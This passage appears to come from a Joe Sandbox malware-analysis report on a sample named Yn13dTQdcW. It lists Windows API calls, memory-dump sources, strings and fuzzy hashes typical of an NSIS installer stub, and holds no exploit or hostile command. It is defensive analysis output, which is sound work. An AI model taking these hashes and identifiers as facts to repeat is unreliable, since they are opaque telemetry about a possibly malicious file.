                                                                                                                                                                                        • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                      • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                      • API String ID: 2577523808-3778932970
                                                                                                                                                                                      • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                      • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcatwsprintf
                                                                                                                                                                                      • String ID: %02x%c$...
                                                                                                                                                                                      • API String ID: 3065427908-1057055748
                                                                                                                                                                                      • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                      • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                      • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                      • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                      • API String ID: 2266616436-4211696005
                                                                                                                                                                                      • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                      • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429574,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                      • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1599320355-0
                                                                                                                                                                                      • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                      • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                      • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                      • String ID: Version
                                                                                                                                                                                      • API String ID: 512980652-315105994
                                                                                                                                                                                      • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                      • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                      • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                      • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                      • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                      • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                      • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2883127279-0
                                                                                                                                                                                      • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                      • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                      • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                      • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                      • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                      • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                      • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                      • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                      • String ID: !N~
                                                                                                                                                                                      • API String ID: 623250636-529124213
                                                                                                                                                                                      • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                      • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                      • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                      • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                      • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                      • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1656024097.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656081785.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656100143.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1656392922.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Yn13dTQdcW.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                      • API String ID: 3509786178-2769509956
                                                                                                                                                                                      • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                      • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                      • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                      • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1656046190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
